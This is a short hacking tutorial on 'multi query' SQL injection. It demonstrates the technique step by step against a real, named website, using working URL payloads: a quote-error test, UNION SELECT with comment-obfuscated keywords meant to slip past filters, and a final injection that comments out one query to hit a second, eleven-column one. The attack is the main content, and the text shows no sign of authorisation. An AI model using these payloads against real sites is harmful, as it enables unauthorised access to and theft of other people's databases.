๐MultiQuery Injection
First of all the basic difference between both of them:
In Routed query injection our payload gets injected in the first query and then the output of that query gets injected in the second query and so on.
In Multi query Injection we design our payload in such a manner that it can inject two or more queries with the same injection. No output from one query to another is passed in this scenario.
Testing for MultiQuery Injection, well its simple SQLi testing but in the end when we dont see any output from union based injection we can try and test for Multiquery injection
----------------------------------------------------------------
Lets start with the Injection:
http://www.plantandem.be/home.php?p=g&id=4'It shows the error alongwith the query, so we dont need to use order by as we can see there are two columns:
----------------------------------------------------------------
Now we can directly use Union select for that:
http://www.plantandem.be/home.php?p=g&id=4 and 0=1/*!UnIOn*/Select 1,2--+But we are not getting any output using the above query. Well thats when it all started, i was trying to inject this site and it refused to show any ouput. That made me alot frustrated.
But we are not getting any output using the above query. Well thats when it all started, i was trying to inject this site and it refused to show any ouput. That made me alot frustrated.And Boooooom!!!! it gave me another error:
http://www.plantandem.be/home.php?p=g&id=4/*!UnIOn*/Select 1,2--+'
Now heres the basic logic of Multi Query Injection. We have multiple queries on that page when we inserted a single quote we got the error from first query but the first query was not giving any output. Now as we commented the first query we can write anything after comment and that wont create any error so when we inserted a single quote after comment, the first query passed and the second query is now getting injected, we can make it more simple as we can see there are eleven column in the query so we will first comment the first query and then inject the second one with eleven columns.
http://www.plantandem.be/home.php?p=g&id=4--+'and+false/*!50000union*/select+1,2,3,4,5,6,7,8,9,10,11--+'
And congrats we got the printable column. Now rest of the part is simple like other injection.
Last updated